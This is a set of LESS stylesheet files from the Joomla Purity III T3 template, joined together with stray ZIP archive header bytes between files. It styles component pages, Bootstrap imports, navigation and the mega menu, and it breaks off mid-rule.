.registration fieldset dt {
  margin-right: 5px;
}

.admintable textarea {
  max-width: 90% !important;
  resize: none;
}



//
// MAILTO WINDOWS
// ---------------------------------------------------------
.com_mailto {
  body {
    padding: @t3-global-padding / 2;
  }

  .t3-mainbody {
    padding-top: 0;
    padding-bottom: 0;
  }

  .t3-content {
    width: auto;
  }
}

#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;

  h2 {
    margin-top: 0;
    margin-bottom: 20px;
  }
  
  .mailto-close {
    a {
      :hover {

      }
    }
  }
}

#mailtoForm {
  .formelm {
    padding: 5px 0;
    vertical-align: middle;
    overflow: hidden;
  }
  
  .formelm label {
    display: inline-block;
    float: left;
    font-weight: bold;
    vertical-align: middle;
    width: 100px;
  }
  
  p {
    margin-top: 20px;
  }
  
  .input,
  .inputbox {
    width: 65%;
  }
  
  .btn,
  .button,
  button {
    margin-right: 5px;
  }
}



//
// USERS
// ---------------------------------------------------------
.user-details {
  padding: 10px 0;

  p {
    margin: 0 0 5px;
  }
  
  label {
    display: block;
    float: left;
    font-weight: bold;
    text-align: right;
    width: 130px;
  }
  
  .input,
  .inputbox {
    margin-left: 10px;
    width: 200px;
  }
  
  .btn,
  button {
    margin-left: 140px;
  }
  
  .paramlist {
    .paramlist_key {
      padding: 0 0 5px;
      width: 130px;
    }
    
    .paramlist_value {
      padding: 0 0 5px;
    }
  }
  
  .user_name span {
    font-weight: bold;
    padding-left: 10px;
  }
}


// Reset & Remind
// --------------
.reset .form-validate p,
.remind .form-validate p {
  background: @gray-lighter;
  border: 1px solid @t3-border-color;
  margin-bottom: @t3-global-margin;
  padding: (@t3-global-padding / 2) @t3-global-padding;
  border-radius: @border-radius-base;
}

.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}

.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}


// Profile
//---------
.profile .dl-horizontal {
  dd {
  }
  
  dt {
  }
}


// Edit Profile
// ------------
.profile-edit {
  input {
    .make-sm-column(6, @padding-base-horizontal);  // Make the input have the same width
  }
  select {
    .make-sm-column(6, @padding-base-horizontal);  // Make the select have the same width
  }
  select + button {
    margin-left: 5px;
  }
}


//
// SEARCH
// ---------------------------------------------------------
.search {
}

.searchintro {
}


// Search Form
// -----------
#searchForm {
  .clearfix();

  fieldset {
    margin: @t3-global-margin 0;
  }

  legend {
    margin-bottom: @t3-global-margin / 2;
  }

  .radio-inline,
  .checkbox-inline {
  }

  select {
    width: auto;
    display: inline-block;
    margin-left: 5px;
    padding-left: 5px;
  }

  .form-limit {
    margin-top: @line-height-computed;
    .counter {
      margin-top: 0;
			border: none;
			font-size: 14px;
			font-weight: bold;
			color: #0077bb;
    }
  }

}

// Block level forms elements on Mobile
@media screen and (max-width: @screen-sm-min) {
  #searchForm {
    .radio-inline,
    .checkbox-inline {
      display: block;
      width: 100%;
      margin-left: 0;
    }
  }
}




// Search Result
// -------------
.search-results {
  margin-top: @t3-global-margin;

  // Title
  .result-title {
    font-size: @t3-font-size-bigger;
    font-weight: bold;
    margin-top: @t3-global-margin;
  }

  // Category
  .result-category {
    font-size: @t3-font-size-smaller;
    color: @gray-light;
  }

  // Result Text
  .result-text {
    margin-top: 5px;
    margin-bottom: 5px;
  }

  // Result URL
  .result-url {
    color: @gray;
    margin-top: @line-height-computed;
  }

  // Date
  .result-created {
    font-size: @t3-font-size-smaller;
    color: @gray-light;
  }

  // Higlight
  .highlight {
  }
}



//
// SMART SEARCH
// ---------------------------------------------------------
div.finder {
  margin-bottom: @line-height-computed;

  .input-group {
    display: flex;

    input {
      flex: 1;
    }
  }

  #search-form {
  }

  #advancedSearch {
  }

  // The Form
  #finder-search {
  }

  // The result
  #search-results {
    #search-query-explained{
    }
  }

  .com-finder__tips {
    margin-top: @t3-global-margin;
  }

}

#finder-filter-window {
  margin-top: @t3-global-margin;
  // Filter By Date
  #finder-filter-select-dates {
    display: grid;
    grid-template-columns: 1fr;
    gap: @t3-global-margin/2;
    margin-bottom: @t3-global-margin*2;

    @media screen and (min-width: 1200px) {
      grid-template-columns: repeat(2, 1fr);
    }

    .filter-date {
      display: flex;
      flex-wrap: wrap;
      padding: 0;
      gap: @t3-global-margin/2;
      width: 100%;

      label {
        flex-basis: 100%;
      }

      select.inputbox {
        margin: 0;
        width: 100% !important;
        max-width: unset;
      }

      .field-calendar {
        width: 100%;
        .form-control {
          flex: 1;
          max-width: unset;
          width: 100%;
        }
      }

      .chzn-container {
        margin-bottom: 6px;
      }

      br {
        display: none;
      }
    }

  }

  // Filter By Type 
  .filter-branch {
    display: flex;
    flex-wrap: wrap;
    flex-direction: column;
    gap: @t3-global-margin/2;
    width: 100%;

    @media (min-width: @screen-lg) {
      flex-direction: row;
    }

    .control-label {
      padding: 0;
      margin-bottom: @t3-global-margin/2;
    }

    .controls {
      margin-left: 0;

      select {
        color: #9e9e9e;
        width: 100%;
      }
    }
  }
}



//
// CONTACT
// ---------------------------------------------------------
.contact {
  .contact-form {
    .checkbox {
      input#jform_contact_email_copy {
        margin-left: 0;
      }
    }
  }

  .thumbnail {
    padding: 4px;
  }

  dd::after {
    display: none;
  }

  .icon-address::before {
    content: '\f02d';
  }

  .icon-fax::before {
    content: '\f109';
  }
}

.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}



//
// ARCHIVED ITEMS
// ---------------------------------------------------------
#archive-items {
  > li {
    line-height: normal;
    margin: 0;
    overflow: visible;
    padding: 0;
  }

  .intro {
    clear: both;
    overflow: hidden;
  }
}



//
// CATEGORY LIST
// ---------------------------------------------------------
.categories-list {
  margin-bottom: @line-height-computed;
}

.category-desc {
}

.contact-category {
  ul.category {
    border-top: 0;
    overflow: hidden;

    li.row-fluid {
      border: 1px solid @gray-lighter;
      width: 100%;
      margin-right: 0;
      margin-left: 0;
      .clearfix();

      & > div {
        margin: 0;
      }
    }
  }

  .cat-children {
    ul {
      border: 0;
      border-top: 1px solid @t3-border-color;

      li {
        background: transparent;
        border-bottom: 1px solid @t3-border-color;
        padding: 5px 0 5px 0;

        h4 {
          border-left: 1px dotted @gray-light;
          font-size: 14px;
          font-weight: 600;
          padding: 0;
          padding-left: 15px;
          margin-left: 20px;
          position: relative;

          &:after {
            border-top: 1px dotted @gray-light;
            display: block;
            content: "";
            position: absolute;
            left: 0;
            top: 8px;
            height: 1px;
            width: 10px;
          }
        }

        li h4 {
          margin-left: 40px;
        }

        li li h4 {
          margin-left: 60px;
        }

        li li li h4 {
          margin-left: 80px;
        }

        &:last-child {
          border: 0;
        }
      }
    }
  }
}



// Category List
// -----------------
.category-item {
  .clearfix();

  .page-header {
    line-height: normal;
    padding: (@line-height-computed / 2) 5px;
    margin: 0;
    font-size: @font-size-large;
    font-weight: normal;
  }

  // Sub Categories
  .category-item {
    margin-bottom: 0;
    margin-left: @grid-gutter-width;
    .page-header {
      font-size: @font-size-base;
    }
  }

}

// Children Category List
// -----------------------
.cat-children {
  h3 {}
  .page-header {
    line-height: normal;
    padding: (@line-height-computed / 2) 5px;
    margin: 0;
    font-size: @font-size-large;
    font-weight: normal;
  }
}



//
// NEWS FEEDS
// ---------------------------------------------------------

// Feed categories
// ---------------
.newsfeed-category,
.newsfeed {
  > h2 {
    border-bottom: 1px solid @t3-border-color;
    padding-bottom: @t3-global-padding;
    margin-bottom: @t3-global-margin;
    margin-top: 0;
  }

  .category-desc {
    margin-bottom: @t3-global-margin;
  }
  
  .category {
    li {
      .clearfix();
    }
  }
}


// Feeds item
// ----------
.newsfeed {
  > h2 {
    border-bottom: 1px solid @t3-border-color;
    padding-bottom: @t3-global-padding;
    margin-bottom: @t3-global-margin;
    margin-top: 0;
  }

  .feed-description {
    margin-bottom: @t3-global-margin;
    font-size: @t3-font-size-bigger;
  }
  
  .feed-item-description .feed-description {
    font-size: @font-size-base;
  }
  
  ol li > a {
    font-weight: bold;
    font-size: @t3-font-size-bigger;
  }
}



// 
// CONTENT NAVIGATIONS
// ---------------------------------------------------------

//  Pagebreak Nav
// --------------
.article-content .pagination {

  ul {
    border-left: 1px solid @t3-border-color;
  }
  
  li {
    float: left;
    padding: (@t3-global-padding / 2) @t3-global-padding;
    line-height: normal;
    border: 1px solid @t3-border-color;
    border-left: 0;
    // Hover state
    &:hover {
    }
  }

  li a {
    border: 0;
    text-decoration: none;
    background-color: transparent;
    line-height: normal;
    padding: 0;
    // Link States
    &:hover, &:focus, &:active {
    }
  }
}

.pagenavcounter {
  margin: 0 0 @t3-global-margin;
  font-weight: bold;
}


// PageBreak Index
// ---------------
#article-index,
.article-index {
  margin: 0 0 @t3-global-margin @t3-global-margin;
  padding: 10px;
  width: 25%;
  border: 1px solid @t3-border-color;
  border-radius: @border-radius-base;
  
  ul {
    margin: 0;
    padding: 0;
    border: 0;

    > li {
      border: 0;
      margin-top: 2px;
    }

    // Link
    > li > a {
      border: 0;
      padding: 5px;
      border-radius: @nav-pills-border-radius;
      // Link states
      &:hover, &:active, &:focus {
      }
    }

    // Active
    > .active > a {
      border: 0;
      background: @nav-pills-active-link-hover-bg;
      color: @nav-pills-active-link-hover-color;
      // Link states
      &:hover, &:active, &:focus {
        border: 0;
        background: @nav-pills-active-link-hover-bg;
        color: @nav-pills-active-link-hover-color;
      }
    }

  }
}


// Articles Navigation
// -------------------
.pagenavigation ul.pagination,
.pagenav {
  float: none;
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: space-between;

  > li {
    margin: 0;
    padding: 0;
    float: left;
  }
  
  > li.pagenav-prev,
  > li.previous {
    margin-right: 10px;
  }
  
  > li.pagenav-next,
  > li.next {
    margin-left: auto;
  }

  li > a {
    padding: (@t3-global-padding / 2) @t3-global-padding;
    line-height: normal;
    border: 1px solid @pagination-border;
    border-radius: @border-radius-base;
    &:hover, &:active, &:focus {
      background-color: @pagination-hover-bg;
    }
  }

}


// Items More
// -----------
.items-more {
  h3 {
    margin: 0 0 @t3-global-margin;
  }
  
  .nav {
    > li {
      border-top: 1px solid @t3-border-color;
    }
    > li > a {
      padding: @padding-base-vertical 5px;
    }
  }
}


// Back Buttons
// -----------
.back_button a {
  display: block;
  margin: 10px 0;
  // Link states
  &:hover, &:focus, &:active {
  }
}


// Form Control
// ------------
.filters {
  margin: (@t3-global-margin / 2) 0 5px;
}

.display-limit {
  margin: (@t3-global-margin / 2) 0 5px;
}

.filters .filter-search {
  
}

.filters .display-limit {
  float: right;
  text-align: right;
}




// ---------------------------------------------------------
// MESSAGES & NOTIFICATIONS
// ---------------------------------------------------------

//
// MESSAGES
// ---------------------------------------------------------
#system-message {
  dt {
    font-weight: bold;
  }
  
  dd {
    font-weight: bold;
  }

  dd.message ul,
  dd.error ul,
  dd.notice ul {
    margin: 0;
    padding: 0;
  }
  
  dd.message ul li,
  dd.error ul li,
  dd.notice ul li {
    background: none;
    margin: 0;
    padding: 5px;
  }
}


// System Standard Messages
// ------------------------
#system-message dd.message ul {
}

// System Error Messages
// ---------------------
.error {
}

.error h2 {
}

#system-message dd.error ul {
}


// System Notice Messages
// ----------------------
#system-message dd.notice ul {
}

.alert-message {
  .alert-variant(@alert-success-bg; @alert-success-border; @alert-success-text);
}
.alert-notice {
  .alert-variant(@alert-info-bg; @alert-info-border; @alert-info-text);
}
.alert-error {
  .alert-variant(@alert-danger-bg; @alert-danger-border; @alert-danger-text);
}

.alert-error {
  .alert-message {
    background: transparent;
    color: inherit;
  }
}


//
// Tooltips
// ---------------------------------------------------------
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  .box-shadow (none);
  max-width: 300px;
  z-index: 999;
}

.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}

.tip-text {
  font-size: @font-size-base;
  margin: 0;
  padding: 5px 10px;
}

.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}



// ---------------------------------------------------------
// MISC
// ---------------------------------------------------------

// Language 
// --------
.languageswitcherload {
  @media (min-width: @screen-sm) {
    float: right;
    width: 100%;
    .mod-languages {
      text-align: right;
    }
  }
}

// Calendar 
// --------
div.calendar {
  width: 187px;
}

// Page break (tabs type)
// ----------------------
dl.tabs {
  border-bottom: 1px solid lighten(@gray-light, 25%);
  display: block;
  clear: both;
  margin-bottom: 0;
  .clearfix();

  dt.tabs {
    border: 1px solid lighten(@gray-light, 25%);
    display: inline-block;
    padding: (@t3-global-padding / 2) @t3-global-padding;
    margin-right: 5px;
    margin-bottom: -1px;

    h3 {
      margin: 0;
      font-size: @font-size-base;

      a {
        color: @text-color;
        outline: none;

        &:hover, &:focus, &:active {
          color: @link-hover-color;
          text-decoration: none;
        }
      }
    }

    &.open {
      border-bottom-color: @white;

      a {
        font-weight: bold;
      }
    }
  }
}


// ---------------------------------------------------------
// JOOMLA 3.0 EXTENDING BOOTSTRAP
// ---------------------------------------------------------

// iFrames
.iframe-bordered {
  border: 1px solid @table-border-color;
}

// Fixed for Chosen
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}

.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}

.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  .box-sizing (content-box) !important;
}

// Input Prepend Chosen Select Boxes
.input-prepend .chzn-container-single .chzn-single {
  border-color: @input-border;
  height: 26px;
  border-radius: 0 3px 3px 0;
  .box-shadow(none);
}

.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}

.input-prepend .chzn-container-single .chzn-drop{
  border-color: @input-border;
}

// Chosen proper wrapping in Bootstrap btn-group
.btn-group .chzn-results {
  white-space: normal;
}


.js-stools-container-filters {
  .js-stools-field-filter {
    .chzn-single,
    .chzn-drop {
      border-radius: 0;
    }

    #filter_tag_chzn,
    #filter_category_id_chzn,
    #filter_access_chzn,
    #filter_author_id_chzn {
      width: auto !important;

      ul {
        li {
          input {
            width: 208px !important;
            height: 24px !important;
          }
        }
      }
    }
  }
}

.picker {
  background: green !important;
  .picker__box {
    .picker__header {
      display: flex;

      .picker__select--month {
        margin-left: @t3-global-padding;
      }
    }
  }
}

// fixbug
#glossary-detail {

  .modal-dialog {
    height: 100vh;
    position: relative;
  }
  
  .modal-content {
    padding: 24px;
    position: absolute;
    top: 50%;
    transform: translateY(-50%);

    .modal-header {
      flex-direction: row-reverse;
      justify-content: space-between;
      padding: 0 0 24px;

      &::after,
      &::before {
        display: none;
      }

      .close {
        padding: 6px 10px;
        background-color: #005788;
        color: #fff;
        opacity: 1;
        transition: all .3s ease-in-out;
        &:hover {
          opacity: .7;
        }
      }
    }

    .modal-body {
      margin-top: 24px;
    }
  }
}PKԜ�\O��C�
�
purity_iii/less/bootstrap.lessnu&1i�/*!
 * Bootstrap v3.0.0
 *
 * Copyright 2013 Twitter, Inc
 * Licensed under the Apache License v2.0
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Designed and built with all the love in the world by @mdo and @fat.
 */


// Core variables and mixins
//@import "variables.less";	//T3 Note: Already in T3 vars.less
//@import "mixins.less";	//T3 Note: Already in T3 vars.less
@import "vars.less"; // Modify this for custom colors, font-sizes, etc

// Reset
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/normalize.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/print.less";

// Core CSS
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/scaffolding.less";
//@import "../../../plugins/system/t3/base-bs3/bootstrap/less/type.less";       //T3 Note: Already in t3/typography.less;
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/code.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/grid.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/tables.less";

@import "../../../plugins/system/t3/base-bs3/less/legacy-forms.less";           //T3 Note: Extend styles for Legacy classes. 
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/forms.less";

@import "../../../plugins/system/t3/base-bs3/bootstrap/less/buttons.less";

@import "../../../plugins/system/t3/base-bs3/less/legacy-navigation.less";      //T3 Note: Extend styles for Legacy classes.

// Components
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/component-animations.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/glyphicons.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/dropdowns.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/button-groups.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/input-groups.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/navs.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/navbar.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/breadcrumbs.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/pagination.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/pager.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/labels.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/badges.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/jumbotron.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/thumbnails.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/alerts.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/progress-bars.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/media.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/list-group.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/panels.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/wells.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/close.less";

// Components w/ JavaScript
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/modals.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/tooltip.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/popovers.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/carousel.less";

// Utility classes
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/utilities.less";
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/responsive-utilities.less";
PKԜ�\�B�LBBpurity_iii/less/navigation.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 

// ------------------------------------------------------
// CORE NAVIGATIONS ELEMENTS
// ------------------------------------------------------

//
// DROPDOWN (dropdowns.less)
// --------------------------------------------------

// Dropdown arrow/caret
// --------------------
.caret {
  margin-left: 5px;
  margin-top: -2px;
}


// The dropdown wrapper (div)
// --------------------------
.dropdown {
}


// The dropdown menu (ul)
// ----------------------
.dropdown-menu {
  padding: 0;
  min-width: 200px;

  // Dividers (basically an hr) within the dropdown
  .divider {
    margin: 0;
    height: 10px;
    background-color: darken(@dropdown-bg,5%);
  }

  // Links within the dropdown menu
  > li {
    border-top: 1px solid @dropdown-divider-bg;
    &:first-child {
      border-top: 0;
    }
  }
  > li > a {
    padding: 10px 20px;
  }
}

// Hover/Focus state
.dropdown-menu > li > a {
  &:hover,
  &:focus {
  }
}

// Active state
.dropdown-menu > .active > a {
  &,
  &:hover,
  &:focus {
  }
}

// Disabled state
.dropdown-menu > .disabled > a {
  &,
  &:hover,
  &:focus {
  }
}

// Nuke hover/focus effects
.dropdown-menu > .disabled > a {
  &:hover,
  &:focus {
  }
}


// Dropdown section headers
// ------------------------
.dropdown-header {
  padding: 3px 20px;
  font-size: @font-size-base;
  // T3: Links in Header
  a {
    color: @dropdown-header-color;
  }
}


// T3 Note: Extend BS3 Dropdown Menu to multi level
// See "base-bs3/less/legacy-navigation.less"
// Dropdown Sub Menus
// ------------------
.dropdown-submenu > .dropdown-menu {
}

// Caret to indicate there is a submenu
.dropdown-submenu > a:after {
  border-left-color: @dropdown-link-color;
}

.dropdown-submenu:hover > a:after {
  border-left-color: @dropdown-link-hover-color;
}



//
// NAVS (navs.less)
// --------------------------------------------------

// Base class
// ----------
.nav {

  // Nav Items
  > li {
    > a {
      // Hover state
      &:hover,
      &:focus {
      }
    }

    // Disabled state
    &.disabled > a {
      // Hover state
      &:hover,
      &:focus {
      }
    }
  }

  // Seperator
  > li > .separator {
    position: relative;
    display: block;
    padding: @nav-link-padding;
    line-height: @line-height-computed;

    @media (min-width: @grid-float-breakpoint) {
      padding-top: ((@navbar-height - @line-height-computed) / 2);
      padding-bottom: ((@navbar-height - @line-height-computed) / 2);
    }
  }

  // Open dropdowns
  .open > a {
    &,
    &:hover,
    &:focus {
      // The caret
      .caret {
      }
    }
  }

  //End
}


// Tabs
// ----
.nav-tabs {
  border-bottom: 1px solid @t3-border-color;

  > li {
    // Actual tabs (as links)
    > a {
      padding: 10px;
      line-height: normal;
      border: 0;
      text-transform: uppercase;
      // Hover state
      &:hover {
        border: 0;
        background: transparent;
      }
    }

    // Active state, and it's :hover to override normal :hover
    &.active > a {
      background: @gray-dark;
      border: 0;
      color: #fff;
      margin-bottom: 0;
      &,
      &:hover,
      &:focus {
        background: @gray-dark;
        border: 0;
        color: #fff;
      }
    }

  }

  //End
}

.tab-content {
  padding: 10px 0;
  border-top: 0;
}


// Pills
// -----
.nav-pills {
  > li {

    // Links rendered as pills
    > a {
    }

    + li {
    }

    // Active state
    &.active > a {
      &,
      &:hover,
      &:focus {

        // The caret
        .caret {
        }
      }
    }

  }

  // End
}


// Dropdowns Caret in Nav
// ----------------------
// Make dropdown carets use link color in navs
.nav .caret {
  border-top-color: @link-color;
  border-bottom-color: @link-color;
}

.nav a:hover .caret {
  border-top-color: @link-hover-color;
  border-bottom-color: @link-hover-color;
}



// 
// BREADCRUMS (breadcrums.less)
// -------------------------------------------------------
.t3-navhelper {
  background: @breadcrumb-bg;
  color: @breadcrumb-color;
  padding: 5px 0;
}

.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;

  > li {
    + li:before {
      content: "@{breadcrumb-separator}\00a0"; // Unicode space added since inline-block means non-collapsing white-space
    }
  }
  > li:nth-child(2) {
    &:before {
      content: "";
    }
  }
  // Active
  > .active {
    color: @breadcrumb-active-color;
  }

  // T3 Note: Hide default Joomla! arrow in breadcrum
  .divider {
    display: none;
  }
}



//
// PAGINATION (MULTIPLE PAGES) (pagination.less)
// --------------------------------------------------
.pagination-wrap {
}

.pagination {

  > li {
    > a,
    > span {
    }
  }

  // Hover state
  > li > a,
  > li > span {
    &:hover,
    &:focus {
    }
  }

  // Active state
  > .active > a,
  > .active > span {
    &,
    &:hover,
    &:focus {
    }
  }

  // Disabled state
  > .disabled {
    > span,
    > span:hover,
    > span:focus,
    > a,
    > a:hover,
    > a:focus {
    }
  }
}


// T3 Note: Fix for Joomla! Pagination
// ------------------------------------
.pagination {
  .clearfix();
  display: block;
  // left align on Tablets / Desktop
  @media screen and (min-width: @screen-sm) {
    float: left;
  }
  // re-defined nested class - joomla structure
  .pagination {
    display: inline-block;
  }
}


// Counter
// -------
.counter {
  display: inline-block;
  margin-top: @line-height-computed;
  padding: @padding-base-vertical @padding-base-horizontal;
  background-color: @pagination-bg;
  border: 1px solid @pagination-border;
  border-radius: @border-radius-base;
  // Right align on Tablets / Desktop
  @media screen and (min-width: @screen-sm) {
    float: right;
  }
}


// Sizing
// ------
// Large
.pagination-lg {
}

// Small
.pagination-sm {
}



//
// PAGER PAGINATION (pager.less)
// --------------------------------------------------
.pager {

  li {
    > a,
    > span {
    }

    // Hover state
    > a:hover,
    > a:focus {
    }

    // Active state
    &.active,
    &.active:hover,
    &.active:focus {
    }
  }

  .next {
    > a,
    > span {
    }
  }

  .previous {
    > a,
    > span {
    }
  }

  // Disabled state
  .disabled {
    > a,
    > a:hover,
    > a:focus,
    > span {
    }
  }

}
PKԜ�\V��00purity_iii/less/megamenu.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "vars.less"; // Include Variables and Mixins


// EXTEND STYLE IN BASE
// --------------------
@import "../../../plugins/system/t3/base-bs3/less/megamenu.less";


//
// BASIC STYLE FOR MEGAMENU
// -------------------------
.t3-megamenu {

  // THE MEGAMENU
  //--------------------------------------------

  // Global Menu Inner padding
  // -------------------------
  .mega-inner {
    padding: @t3-global-padding 0;
  }

  // Inner Padding for 1 column
  .col-lg-12 .mega-inner,
  .col-md-12 .mega-inner,
  .col-sm-12 .mega-inner,
  .col-xs-12 .mega-inner {
  }


  // Menu Grids
  // ----------
  .row {
    margin-left: auto;
    margin-right: auto;
  }

  .row + .row  {
    padding-top: @t3-global-padding/2;
    border-top: 1px solid lighten(@dropdown-bg,5%);
  }


  // The Dropdown
  // ------------
  .mega-dropdown-menu {
    color: @gray-lightest;
  }


  // Dropdown Sub Menus
  // ------------------
  .dropdown-submenu {
  }


  // The Group
  // ---------
  .mega-group {
    border: 0 !important;
  }

  // Group Title
  // We use BS3 "dropdown-header"
  //.mega-nav .mega-group > .mega-group-title,
  //.dropdown-menu .mega-nav .mega-group > .mega-group-title,
  //.dropdown-menu .active .mega-nav .mega-group > .mega-group-title
  .dropdown-header,
  .mega-nav .mega-group > .dropdown-header,
  .dropdown-menu .mega-nav .mega-group > .dropdown-header,
  .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
    margin: 0;
    padding: 0;
    background: @t3-module-title-bg;
    color: @t3-module-title-color;
    font-size: @font-size-large;
    line-height: normal;
    white-space: nowrap;
    // Link states
    &:hover, &:active, &:focus {
      background: inherit;
      color: inherit;
    }
  }

  // Group Content
  .mega-group-ct {
    .row {
      margin-left: -(@grid-gutter-width / 2);
      margin-right: -(@grid-gutter-width / 2);
    }
  }


  // Nav in Megamenu
  // ---------------
  .mega-col-nav {
  }

  // Inner padding
  .mega-col-nav .mega-inner {
  }

  // Inner padding for nav in 1 column
  .col-lg-12.mega-col-nav .mega-inner,
  .col-md-12.mega-col-nav .mega-inner,
  .col-sm-12.mega-col-nav .mega-inner,
  .col-xs-12.mega-col-nav .mega-inner {
  }

  .mega-group .col-lg-12.mega-col-nav .mega-inner,
  .mega-group .col-md-12.mega-col-nav .mega-inner,
  .mega-group .col-sm-12.mega-col-nav .mega-inner,
  .mega-group .col-xs-12.mega-col-nav .mega-inner {
  }

  // The Nav
  .mega-nav,
  .dropdown-menu .mega-nav {
  }

  .mega-nav > li,
  .dropdown-menu .mega-nav > li {
    border-bottom: 1px solid lighten(@dropdown-bg, 5%);
    &:first-child {
      border-top: 1px solid lighten(@dropdown-bg, 5%);
    }
  }

  .mega-nav > li a,
  .dropdown-menu .mega-nav > li a {
    padding: @t3-global-padding / 2;
    color: @gray-lighter;
  }

  .dropdown-menu .mega-nav > li .separator {
  }

  .mega-nav > li.open > a,
  .dropdown-menu .mega-nav > li.open > a {
    background: @dropdown-link-hover-bg;
  }

  .mega-nav > li.active > a,
  .dropdown-menu .mega-nav > li.active > a {
    color: @white;
    background: @dropdown-link-hover-bg;
  }

  // Nav in Group
  .mega-group > .mega-nav,
  .dropdown-menu .mega-group > .mega-nav {
  }

  .mega-group > .mega-nav > li,
  .dropdown-menu .mega-group > .mega-nav > li {
  }

  .mega-group .mega-nav > li a,
  .dropdown-menu .mega-group .mega-nav > li a {
  }

  // The caret
  .mega-nav .dropdown-submenu > a::after {
    margin-right: 0;
  }


  // Modules in Megamenu
  // -------------------
  .mega-col-module {
  }

  // Inner padding
  .mega-col-module .mega-inner {
  }

  // The module
  .t3-module {
  }

  // Module Title
  .t3-module .module-title {
    color: @gray-lighter;
    .dropdown-header(); // Make the Module Title look like Dropdown Header
    margin-bottom: 20px;
  }

  // Module Content
  .t3-module .module-ct {
  }

  // List in Module
  // Reset List Style in Module
  .t3-module ul,
  .t3-module .nav {
    padding-left: @t3-global-padding;
  }

  .t3-module ul li,
  .t3-module .nav li {
    list-style: disc;
    display: list-item;
    float: none;
    margin: 0;
    padding: 0;
    border: 0;
  }

  .t3-module ul li a,
  .t3-module .nav li a {
    display: inline;
    padding: 0;
    margin: 0;
    border: 0;
    font-size: 100%;
    background: none;
    font: inherit;
    white-space: normal;
    color: @gray-lightest;

    // Link states
    &:hover, &:focus, &:active {
      background: transparent;
      color: @link-color;
      font: inherit;
    }
  }

  // Reset Link Style in Module
  a:hover, &:focus, a:active {
  }
  // Nav in Module
  .dropdown-menu .t3-module .nav {
  }

  .dropdown-menu .t3-module .nav li {
  }

  .dropdown-menu .t3-module .t3-module li a {
    // Link states
    &:hover, &:focus, &:active {
    }
  }
  

  // The caption
  // -----------
  .mega-caption {
    color: @gray-light;
    font-size: @t3-font-size-smaller;
    margin-top: 3px;
    font-weight: normal;
  }


  // The caret
  // ---------
  .nav .caret,
  .dropdown-submenu .caret,
  .mega-menu .caret {
  }

  // Show the caret on level 0 only
  .nav > .dropdown > .dropdown-toggle .caret {
  }


  // The icon
  // --------
  .nav [class^="icon-"],
  .nav [class*=" icon-"],
  .nav .fa {
  }

  // Reset the margin on Input Group Addon
  .nav .input-group-addon [class^="icon-"],
